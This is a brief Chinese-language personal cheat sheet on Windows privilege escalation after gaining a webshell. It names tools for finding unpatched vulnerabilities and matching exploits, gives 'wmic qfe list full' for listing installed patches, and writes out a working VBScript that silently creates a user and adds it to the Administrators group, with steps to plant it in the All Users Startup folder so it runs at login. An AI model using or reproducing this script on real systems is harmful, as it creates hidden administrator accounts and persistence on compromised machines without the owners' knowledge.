提权记录

最佳拍档A  -- 检索没有安装的补丁编号
最佳拍档B  --  查找相关漏洞编号的使用范围，包括系统版本
渗透工具集合 -- 含有大部分漏洞利用程序

 webshell写入启动项目提权

set wshshell=createobject ("wscript.shell")
a=wshshell.run ("cmd.exe /c net user 用户名 密码  /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators 用户名 /add",0)

保存为xx.vbs
放入 C:\Documents and Settings\All Users\「开始」菜单\程序\启动 ，前提可写

有一条命令可以提取出补丁的详细信息：
        wmic qfe list full

参考链接：
1. Web安全之Windows提权